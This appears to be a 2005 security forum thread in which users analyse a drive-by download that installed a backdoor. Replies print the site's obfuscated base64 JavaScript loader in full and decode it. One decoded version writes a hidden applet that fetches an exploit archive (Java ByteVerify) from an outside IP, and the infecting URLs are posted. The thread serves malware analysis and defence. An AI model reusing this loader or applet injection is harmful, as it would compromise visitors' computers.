Javasys.exe: More of the same or new?

Discussion in 'Computer Security' started by MaxPower, Sep 4, 2005.

  1. MaxPower

    MaxPower Guest

    After visiting a website I found an executable named
    \WINNT\Java\Javasys.exe running on my system.

    Almost immediately, ZoneAlarm told me that this Javasys.exe was trying
    to access the Internet.

    Just to see what would happen, I allowed it to access the Internet and
    it downloaded another executable, which triggered a Zone Alarm security
    alert:

    "nnnm32 is trying to set 'antivirus' to run each time your computer is
    started".

    Actually the name of nnnm32.exe may vary: in a few tries I saw it named
    comm.exe, ping.exe and so on.

    Allowed to access the Internet, nnnm32.exe downloaded a third
    executable (timer.exe) which in turn tried to access the Internet.

    From this point on, seemingly no further change occurred in My Processes
    list within Task Manager.

    I then did a scan for spyware with the latest versions of all the
    following:

    ZoneAlarm 6 Pro
    Ad-Aware 1.06r1 Personal (free)
    SpyBot S&D 1.4
    SpySweeper 4.04
    Spyware Doctor 3.2.1.
    AntiVIR Personal 6.31 (free)

    but none of them found any threat (!)

    A couple of weeks later, after downloading an updated virus definition
    file, I scanned the system again with AntiVIR and this time it found in
    timer.exe a backdoor named BDS/Webdor.AD.1


    My configuration:

    - Windows 2000 Professional SP4, IE6 Security set to "medium";
    - ZoneAlarm Pro 6;
    - AntiVIR Personal Edition 6.31 (free);
    - SpyBot S&D 1.4 w/ Teatimer (resident antispyware).


    For those interested, the URL spreading this malware is the following:

    ***********************************************************
    DO NOT VISIT THIS URL UNLESS YOU WANT TO GET YOUR COMPUTER INFECTED!
    http://198.88.20.158/gal/403/index.html
    ***********************************************************

    My question is: How can I prevent any executable from installing in such an
    insidious way?

    With IE6 Security set to "High" this malware could not install, but of
    course I would like to keep IE6 Security set to "Medium", otherwise
    navigation is most unpractical.

    Thank you in advance for any advice.
     
    MaxPower, Sep 4, 2005
    #1

  2. hatschi

    hatschi Guest

    You can use any website you want. The only thing to care about is:

    I will write this in big letters, so that everyone sees the importance...

    DON'T USE THE ADMINISTRATOR ACCOUNT FOR SURFING OR EVEN WORKING!!!

    Only use it to install soft- or hardware. And only that kind of software
    you got from a source you can trust.

    I suggest everyone (EVERYONE) read a book about security!
     
    hatschi, Sep 4, 2005
    #2

  3. Mark

    Mark Guest

    MaxPower wrote:
    <snip>.
    >
    >
    > For those interested, the URL spreading this malware is the following:
    >
    > ***********************************************************
    > DO NOT VISIT THIS URL UNLESS YOU WANT TO GET YOUR COMPUTER INFECTED!
    > http://198.88.20.158/gal/403/index.html
    > ***********************************************************
    >
    > My question is: How can I prevent any executable from installing in such an
    > insidious way?
    >
    > With IE6 Security set to "High" this malware could not install, but of
    > course I would like to keep IE6 Security set to "Medium", otherwise
    > navigation is most unpractical.
    >
    > Thank you in advance for any advice.
    >


    Since the attack starts with a javascript, I suspect that disabling
    javascript would be the only sure way of preventing this particular
    attack. No matter what browser you are using. Which of course you do
    by setting your security to high.

    With that said, this particular script seems to be looking for Internet
    Explorer so it may be exploiting a flaw in that particular browser.
    Keep in mind I didn't go through the entire process of infecting my
    machine so I'm not sure about this. But, if this is the case, using a
    different browser may have prevented this particular attack.

    What might be interesting is if anyone knows of something that could
    block 'suspicious looking' scripts without totally disabling javascript.

    I ask because I found the first one to be suspicious mainly because of
    the attempts to obfuscate the code, i.e. it's all smooshed into one
    line and the meat of it is base64 encoded.

    The index.html attempts to download this:

    <SCRIPT language="JavaScript"
    SRC="http://198.88.20.158/iSponsor.js?bannerid=403"></SCRIPT>

    That script is: (line breaks inserted by my news client)

    var b64, f64, d;
    // note: every '[i]' index in the posted text was swallowed by the forum's
    // BBCode italics filter; the decoder only works with them in place
    // a(): replace any zero byte in the decoded array with 1
    function a(s){var i;for(i=0;i<s.length;i++)if(!s[i])s[i]=1;return s;}
    // u(): UTF-8 byte array -> string
    function u(d){var r=new Array;var i=0;while(i<d.length){
      if(d[i]<128){r[r.length]=String.fromCharCode(d[i]);i++;}
      else if((d[i]>191)&&(d[i]<224)){r[r.length]=String.fromCharCode(((d[i]&31)<<6)|(d[i+1]&63));i+=2;}
      else{r[r.length]=String.fromCharCode(((d[i]&15)<<12)|((d[i+1]&63)<<6)|(d[i+2]&63));i+=3;}}
      return r.join("");}
    // t(): base64 text -> byte array, via the f64 lookup table built in b()
    function t(t){var d=new Array;var i=0;t=t.replace(/\n|\r/g,"");t=t.replace(/=/g,"");
      while(i<t.length){
        d[d.length]=(f64[t.charAt(i)]<<2)|(f64[t.charAt(i+1)]>>4);
        d[d.length]=(((f64[t.charAt(i+1)]&15)<<4)|(f64[t.charAt(i+2)]>>2));
        d[d.length]=(((f64[t.charAt(i+2)]&3)<<6)|(f64[t.charAt(i+3)]));i+=4;}
      if(t.length%4==2)d=d.slice(0,d.length-2);if(t.length%4==3)d=d.slice(0,d.length-1);return d;}
    // b(): build the alphabet tables, then base64 -> bytes -> UTF-8 string
    function b(s){var b64s='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';b64=[];f64=[];
      for(var i=0;i<b64s.length;i++){b64[i]=b64s.charAt(i);f64[b64s.charAt(i)]=i;}return u(a(t(s)));}
    // the decoded string is executed directly (blob split into segments at the original line wraps)
    eval(b("ZnVuY3Rpb24gX19pbmNyZW1lbnRfY291bnRlcigpe3ZhciBjb3V"+
           "udD05MDEyODM7Y291bnQrKzt9O2Z1bmN0aW9uIF9fX2RvX2NoZWNraW5nKCkgewp2YXIgY2Fwcz1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnX19fY19jYXBzJyk7dmFyIGN"+
           "UeXBlPTA7dmFyIHZlcnNpb249MDtpZiAoKHR5cGVvZihjYXBzKSE9J3VuZGVmaW5lZCcpJiYodHlwZW9mKGNhcHMuY29ubmVjdGlvblR5cGUpIT0ndW5kZWZpbmVkJykmJih"+
           "0eXBlb2YoY2Fwcy5nZXRDb21wb25lbnRWZXJzaW9uKSE9J3VuZGVmaW5lZCcpKXsKY1R5cGU9Y2Fwcy5jb25uZWN0aW9uVHlwZTsKdmVyc2lvbj1jYXBzLmdldENvbXBvbmV"+
           "udFZlcnNpb24oJ3swOEIwRTVDMC00RkNCLTExQ0YtQUFBNS0wMDQwMUM2MDg1MDB9JywnQ29tcG9uZW50SUQnKTsKdmFyIHNWZXJzaW9uID0gY2Fwcy5nZXRDb21wb25lbnR"+
           "WZXJzaW9uKCd7MDhCMEU1QzAtNEZDQi0xMUNGLUFBQTUtMDA0MDFDNjA4NTAwfScsJ0NvbXBvbmVudElEJyk7dmFyIHNzOwp2YXIgc3NudW07c3MgPSBzVmVyc2lvbi5zcGx"+
           "pdCgnLCcpO3NzbnVtID0gcGFyc2VJbnQoc3NbMl0pOwppZiAoY2Fwcy5jb25uZWN0aW9uVHlwZT09J21vZGVtJyAmJiBzc251bSA8IDM4MTApewpfX2luY3JlbWVudF9jb3V"+
           "udGVyKCk7ZG9jdW1lbnQud3JpdGUoJycpO31lbHNle2RvY3VtZW50LndyaXRlKCcnKTt9fWVsc2V7c2V0VGltZW91dCgnX19fZG9fY2hlY2tpbmcoKScsMjAwKTt9fTtpZiA"+
           "oKG5hdmlnYXRvci5hcHBOYW1lPT0nTWljcm9zb2Z0IEludGVybmV0IEV4cGxvcmVyJykmJih0eXBlb2YoZG9jdW1lbnQuYWxsKSE9J3VuZGVmaW5lZCcpKXtkb2N1bWVudC5"+
           "3cml0ZSgiPGRpdiBpZD0nX19fY19jYXBzJyBzdHlsZT0nZGlzcGxheTpub25lOyBiZWhhdmlvcjp1cmwoI2RlZmF1bHQjY2xpZW50Y2FwcyknPjwvZGl2PiIpO19fX2RvX2N"+
           "oZWNraW5nKCk7fTtkb2N1bWVudC53cml0ZSgiPCEtLSBQUk9NT1RJT04gQVJFQS0tPiAgICAgIDxkaXYgYWxpZ249J2NlbnRlcic+PGZvbnQgZmFjZT0nQXJpYWwsIEhlbHZ"+
           "ldGljYSwgc2Fucy1zZXJpZicgc2l6ZT0nNCc+PGEgaHJlZj0nJyB0YXJnZXQ9J19ibGFuayc+PC9hPjwvZm9udD48L2Rpdj48IS0tIEVORCAtLT4gICAgICAgICIpOw=="));

    The base64 encoded part roughly decodes to:

    function __increment_counter(){var count=901283;count++;};
    function ___do_checking() {
      // '___c_caps' is the hidden <div> given IE's clientCaps DHTML behavior below
      var caps=document.getElementById('___c_caps');
      var cType=0;var version=0;
      if((typeof(caps)!='undefined')&&(typeof(caps.connectionType)!='undefined')&&(typeof(caps.getComponentVersion)!='undefined')){
        cType=caps.connectionType;
        // {08B0E5C0-...} is the clientCaps component ID for the Microsoft virtual machine (Java)
        version=caps.getComponentVersion('{08B0E5C0-4FCB-11CF-AAA5-00401C608500}','ComponentID');
        var sVersion = caps.getComponentVersion('{08B0E5C0-4FCB-11CF-AAA5-00401C608500}','ComponentID');
        var ss;var ssnum;ss = sVersion.split(',');ssnum = parseInt(ss[2]);  // ss[2] is the build number
        // only a dial-up user with an MSJVM build below 3810 reaches __increment_counter()
        if (caps.connectionType=='modem' && ssnum < 3810){__increment_counter();document.write('');}
        else{document.write('');}
      }else{setTimeout('___do_checking()',200);}
    };
    if ((navigator.appName=='Microsoft Internet Explorer')&&(typeof(document.all)!='undefined')){
      document.write("<div id='___c_caps' style='display:none; behavior:url(#default#clientcaps)'></div>");
      ___do_checking();
    };
    document.write("<!-- PROMOTION AREA--> <div align='center'><font face='Arial, Helvetica, sans-serif' size='4'><a href='' target='_blank'></a></font></div><!-- END --> ");

    Keep in mind I'm not a programmer so I don't know exactly what the above
    does, but I just find the obfuscation suspicious.

    --
    Mark
     
    Mark, Sep 4, 2005
    #3
  4. From: "MaxPower" <>

    |
    | After visiting a website I found an executable named
    | \WINNT\Java\Javasys.exe running on my system.
    |
    | Almost immediately, ZoneAlarm told me that this Javasys.exe was trying
    | to access the Internet.
    |
    | Just to see what would happen, I allowed it to access the Internet and
    | it downloaded another executable, which triggered a Zone Alarm security
    | alert:
    |
    | "nnnm32 is trying to set 'antivirus' to run each time your computer is
    | started".
    |
    | Actually the name of nnnm32.exe may vary: in a few tries I saw it named
    | comm.exe, ping.exe and so on.
    |
    | Allowed to access the Internet, nnnm32.exe downloaded a third
    | executable (timer.exe) which in turn tried to access the Internet.
    |
    | From this point on, seemingly no further change occurred in My Processes
    | list within Task Manager.
    |
    | I then did a scan for spyware with the latest versions of all the
    | following:
    |
    | ZoneAlarm 6 Pro
    | Ad-Aware 1.06r1 Personal (free)
    | SpyBot S&D 1.4
    | SpySweeper 4.04
    | Spyware Doctor 3.2.1.
    | AntiVIR Personal 6.31 (free)
    |
    | but none of them found any threat (!)
    |
    | A couple of weeks later, after downloading an updated virus definition
    | file, I scanned the system again with AntiVIR and this time it found in
    | timer.exe a backdoor named BDS/Webdor.AD.1
    |
    | My configuration:
    |
    | - Windows 2000 Professional SP4, IE6 Security set to "medium";
    | - ZoneAlarm Pro 6;
    | - AntiVIR Personal Edition 6.31 (free);
    | - SpyBot S&D 1.4 w/ Teatimer (resident antispyware).
    |
    | For those interested, the URL spreading this malware is the following:
    |
    | ***********************************************************
    | DO NOT VISIT THIS URL UNLESS YOU WANT TO GET YOUR COMPUTER INFECTED!
    | http://198.88.20.158/gal/403/index.html
    | ***********************************************************
    |
    | My question is: How can I prevent any executable from installing in such an
    | insidious way?
    |
    | With IE6 Security set to "High" this malware could not install, but of
    | course I would like to keep IE6 Security set to "Medium", otherwise
    | navigation is most unpractical.
    |
    | Thank you in advance for any advice.


    Download MULTI_AV.EXE from the URL --
    http://www.ik-cs.com/programs/virtools/Multi_AV.exe

    It is a self-extracting ZIP file that contains the Kixtart Script Interpreter {
    http://kixtart.org Kixtart is CareWare }, three batch files, five Kixtart scripts, one Link
    (.LNK) file, a PDF instruction file and two utilities, UNZIP.EXE and WGET.EXE. It will
    simplify the process of using the Sophos, Trend and McAfee Anti Virus Command Line Scanners to
    remove viruses, Trojans and various other malware.

    C:\AV-CLS\StartMenu.BAT -- { or Double-click on 'Start Menu' in C:\AV-CLS}
    This will bring up the initial menu of choices and should be executed in Normal Mode. This
    way all the components can be downloaded from each AV vendor’s web site.
    The choices are; Sophos, Trend, McAfee, Exit the menu and Reboot the PC.

    You can choose to go to each menu item and just download the needed files or you can
    download the files and perform a scan in Normal Mode. Once you have downloaded the files
    needed for each scanner you want to use, you should reboot the PC into Safe Mode [F8 key
    during boot] and re-run the menu again and choose which scanner you want to run in Safe
    Mode. It is suggested to run the scanners in both Safe Mode and Normal Mode.

    When the menu is displayed hitting 'H' or 'h' will bring up a more comprehensive PDF help
    file.

    To use this utility, perform the following...
    Execute; Multi_AV.exe { Note: You must use the default folder C:\AV-CLS }
    Choose; Unzip
    Choose; Close

    Execute; C:\AV-CLS\StartMenu.BAT
    { or Double-click on 'Start Menu' in C:\AV-CLS }

    NOTE: You may have to disable your software FireWall or allow WGET.EXE to go through your
    FireWall to allow it to download the needed AV vendor related files.

    * * * Please report back your results * * *


    --
    Dave
    http://www.claymania.com/removal-trojan-adware.html
    http://www.ik-cs.com/got-a-virus.htm
     
    David H. Lipman, Sep 5, 2005
    #4
  5. Imhotep

    Imhotep Guest

    MaxPower wrote:

    >
    > After visiting a website I found an executable named
    > \WINNT\Java\Javasys.exe running on my system.
    >
    > Almost immediately, ZoneAlarm told me that this Javasys.exe was trying
    > to access the Internet.
    >
    > Just to see what would happen, I allowed it to access the Internet and
    > it downloaded another executable, which triggered a Zone Alarm security
    > alert:
    >
    > "nnnm32 is trying to set 'antivirus' to run each time your computer is
    > started".
    >
    > Actually the name of nnnm32.exe may vary: in a few tries I saw it named
    > comm.exe, ping.exe and so on.
    >
    > Allowed to access the Internet, nnnm32.exe downloaded a third
    > executable (timer.exe) which in turn tried to access the Internet.
    >
    > From this point on, seemingly no further change occurred in My Processes
    > list within Task Manager.
    >
    > I then did a scan for spyware with the latest versions of all the
    > following:
    >
    > ZoneAlarm 6 Pro
    > Ad-Aware 1.06r1 Personal (free)
    > SpyBot S&D 1.4
    > SpySweeper 4.04
    > Spyware Doctor 3.2.1.
    > AntiVIR Personal 6.31 (free)
    >
    > but none of them found any threat (!)
    >
    > A couple of weeks later, after downloading an updated virus definition
    > file, I scanned the system again with AntiVIR and this time it found in
    > timer.exe a backdoor named BDS/Webdor.AD.1
    >
    >
    > My configuration:
    >
    > - Windows 2000 Professional SP4, IE6 Security set to "medium";
    > - ZoneAlarm Pro 6;
    > - AntiVIR Personal Edition 6.31 (free);
    > - SpyBot S&D 1.4 w/ Teatimer (resident antispyware).
    >
    >
    > For those interested, the URL spreading this malware is the following:
    >
    > ***********************************************************
    > DO NOT VISIT THIS URL UNLESS YOU WANT TO GET YOUR COMPUTER INFECTED!
    > http://198.88.20.158/gal/403/index.html
    > ***********************************************************
    >
    > My question is: How can I prevent any executable from installing in such an
    > insidious way?
    >
    > With IE6 Security set to "High" this malware could not install, but of
    > course I would like to keep IE6 Security set to "Medium", otherwise
    > navigation is most unpractical.
    >
    > Thank you in advance for any advice.



    I went to this site (I use linux/FreeBSD and have java off). Here is some
    info for you:

    The IP address range is owned by Verio. You might want to contact them about
    this server:
    OrgAbuseHandle: VAC5-ARIN
    OrgAbuseName: Verio Abuse Contact
    OrgAbusePhone: +1-800-551-1630
    OrgAbuseEmail:

    After looking at speedslim's records it appears that this is a spoofing
    site...

    Imhotep
     
    Imhotep, Sep 5, 2005
    #5
  6. Imhotep

    Imhotep Guest

    Mark wrote:

    > MaxPower wrote:
    > <snip>.
    >>
    >>
    >> For those interested, the URL spreading this malware is the following:
    >>
    >> ***********************************************************
    >> DO NOT VISIT THIS URL UNLESS YOU WANT TO GET YOUR COMPUTER INFECTED!
    >> http://198.88.20.158/gal/403/index.html
    >> ***********************************************************
    >>
    >> My question is: How can I prevent any executable from installing in such an
    >> insidious way?
    >>
    >> With IE6 Security set to "High" this malware could not install, but of
    >> course I would like to keep IE6 Security set to "Medium", otherwise
    >> navigation is most unpractical.
    >>
    >> Thank you in advance for any advice.
    >>

    >
    > Since the attack starts with a javascript, I suspect that disabling
    > javascript would be the only sure way of preventing this particular
    > attack. No matter what browser you are using. Which of course you do
    > by setting your security to high.
    >
    > With that said, this particular script seems to be looking for Internet
    > Explorer so it may be exploiting a flaw in that particular browser.
    > Keep in mind I didn't go through the entire process of infecting my
    > machine so I'm not sure about this. But, if this is the case, using a
    > different browser may have prevented this particular attack.
    >
    > What might be interesting is if anyone knows of something that could
    > block 'suspicious looking' scripts without totally disabling javascript.
    >
    > I ask because I found the first one to be suspicious mainly because of
    > the attempts to obfuscate the code, i.e. it's all smooshed into one
    > line and the meat of it is base64 encoded.
    >
    > [snip: Mark's copy of iSponsor.js and its decoded form, quoted in full above]
    > --
    > Mark



    ....good job....

    Im
     
    Imhotep, Sep 5, 2005
    #6
  7. Imhotep

    Imhotep Guest

    hatschi wrote:

    > You can use any website you want. The only thing to care about is:
    >
    > I will write this in big letters, so that everyone sees the importance...
    >
    > DON'T USE THE ADMINISTRATOR ACCOUNT FOR SURFING OR EVEN WORKING!!!
    >
    > Only use it to install soft- or hardware. And only that kind of software
    > you got from a source you can trust.
    >
    > I suggest everyone (EVERYONE) read a book about security!


    Yup! Good advice...
     
    Imhotep, Sep 5, 2005
    #7
  8. Ant

    Ant Guest

    "Mark" wrote:

    > MaxPower wrote:


    >> My question is: How can I prevent any executable from installing in such an
    >> insidious way?


    Keep up to date with your security patches, or don't use IE, and don't
    visit such dubious sites.

    >> With IE6 Security set to "High" this malware could not install, but of
    >> course I would like to keep IE6 Security set to "Medium", otherwise
    >> navigation is most unpractical.


    In this particular case you could disable Java and lose very little
    functionality. Note that Java is not the same thing as Javascript.
    Sites tend not to use Java applets for navigation. However, the site
    looks decidedly dodgy, so there could be other exploits lurking there
    (e.g. for Active-X).

    > Since the attack starts with a javascript, I suspect that disabling
    > javascript would be the only sure way of preventing this particular
    > attack. No matter what browser you are using. Which of course you do
    > by setting your security to high.
    >
    > With that said, this particular script seems to be looking for Internet
    > Explorer so it may be exploiting a flaw in that particular browser.


    Or possibly any browser that uses an exploitable Java virtual machine.

    [snip]

    > The base64 encoded part roughly decodes to:
    >
    > function __increment_counter(){var count=901283;count++;
    > };


    That's strange, I decoded the following for the above function
    ("document.write" line wrapped, and http munged to h--p)

    function __increment_counter() {
    document.write("<APPLET ARCHIVE=\"h--p://209.190.137.29/user/ds/c.jar\"
    codebase=\"h--p://209.190.137.29/user/ds/\"
    CODE=\"BB.class\" WIDTH=1 HEIGHT=1>
    <param name=\"userid\" value=\"global/ds-1\"></APPLET>");};

    The file c.jar is a Java archive (a zip file) containing:

    BB.class
    Beyond.class
    BeyondInterface.class
    Dummy.class
    Manifest.mf
    VerifierBug.class

    The file VerifierBug.class contains the Java byte verify exploit
    (Troj/BytVrfy-A) according to Sophos. Once this runs, your system is
    open for the site to install its payload. I didn't dig further into
    the site's code to see what that malware might be.
     
    Ant, Sep 5, 2005
    #8
  9. From: "Ant" <>


    < snip>

    | The file c.jar is a Java archive (a zip file) containing:
    | BB.class
    | Beyond.class
    | BeyondInterface.class
    | Dummy.class
    | Manifest.mf
    | VerifierBug.class
    |
    | The file VerifierBug.class contains the Java byte verify exploit
    | (Troj/BytVrfy-A) according to Sophos. Once this runs, your system is
    | open for the site to install its payload. I didn't dig further into
    | the site's code to see what that malware might be.
    |

    McAfee as well...
    9/5/2005 6:35:38 PM Deleted (Clean failed) DLIPMAN-1\lipman D:\temp\IE6\Temporary Internet Files\Content.IE5\WCZFECUD\c[1].jar\C[1].JAR Exploit-ByteVerify

    and

    9/5/2005 6:38 PM Infected DLIPMAN-1\lipman C:\Documents and Settings\lipman\Desktop\VerifierBug.class Exploit-ByteVerify (Trojan) (Removable)

    Another case of a .CLASS file in a Java Jar (ZIP type file) having an infector. This is why
    you must enable "scan archive files" in any/all anti virus products.

    --
    Dave
    http://www.claymania.com/removal-trojan-adware.html
    http://www.ik-cs.com/got-a-virus.htm
     
    David H. Lipman, Sep 5, 2005
    #9
  10. Mark

    Mark Guest

    Ant wrote:
    >
    >>>With IE6 Security set to "High" this malware could not install, but of
    >>>course I would like to keep IE6 Security set to "Medium", otherwise
    >>>navigation is most unpractical.

    >
    >
    > In this particular case you could disable Java and lose very little
    > functionality. Note that Java is not the same thing as Javascript.
    > Sites tend not to use Java applets for navigation. However, the site
    > looks decidedly dodgy, so there could be other exploits lurking there
    > (e.g. for Active-X).
    >


    Much better put than what I was trying to say.

    >
    >>
    >>With that said, this particular script seems to be looking for Internet
    >>Explorer so it may be exploiting a flaw in that particular browser.

    >
    >
    > Or possibly any browser that uses an exploitable Java virtual machine.


    True, I was just guessing because the javascript I downloaded appeared
    to be looking for Internet Explorer.

    >
    > [snip]
    >
    >
    >>The base64 encoded part roughly decodes to:
    >>
    >>function __increment_counter(){var count=901283;count++;
    >>};

    >
    >
    > That's strange, I decoded the following for the above function
    > ("document.write" line wrapped, and http munged to h--p)
    >
    > function __increment_counter() {
    > document.write("<APPLET ARCHIVE=\"h--p://209.190.137.29/user/ds/c.jar\"
    > codebase=\"h--p://209.190.137.29/user/ds/\"
    > CODE=\"BB.class\" WIDTH=1 HEIGHT=1>
    > <param name=\"userid\" value=\"global/ds-1\"></APPLET>");};
    >


    That is quite interesting. From what you saw, does the method of
    getting the script change which script you get? What you got looks much
    more interesting.

    All I did was "wget http://198.88.20.158/iSponsor.js" from one of my
    linux boxes. In all honesty, I was being lazy and probably shouldn't
    have posted without all the information.

    --
    Mark
     
    Mark, Sep 6, 2005
    #10
  11. Ant

    Ant Guest

    "Mark" wrote:

    > Ant wrote:
    >> That's strange, I decoded the following for the above function
    >> ("document.write" line wrapped, and http munged to h--p)
    >>
    >> function __increment_counter() {
    >> document.write("<APPLET ARCHIVE=\"h--p://209.190.137.29/user/ds/c.jar\"
    >> codebase=\"h--p://209.190.137.29/user/ds/\"
    >> CODE=\"BB.class\" WIDTH=1 HEIGHT=1>
    >> <param name=\"userid\" value=\"global/ds-1\"></APPLET>");};

    >
    > That is quite interesting. From what you saw, does the method of
    > getting the script change which script you get?


    It could do, depending on how the server is set up to respond to your
    HTTP request headers. For example, some will serve different content
    based on the "User-Agent" field. I only tried one method, which was to
    prefix "view-source:" to the URL in the IE address box. This just
    fetches (GETs) the item into notepad without running or rendering
    anything in the browser.

    > All I did was "wget h--p://198.88.20.158/iSponsor.js" from one of my
    > linux boxes.


    That's the same URL I used (without the "?bannerid=403" after it).
    Perhaps the site doesn't like wget, perhaps iSponsor.js changes from
    time to time, or perhaps it's something else I don't know about. You
    could tell wget to use a User-Agent string like IE or Mozilla sends,
    and see if it makes a difference.

    > In all honesty, I was being lazy and probably shouldn't
    > have posted without all the information.


    Not at all; you sparked my interest to find an exploit!
     
    Ant, Sep 6, 2005
    #11
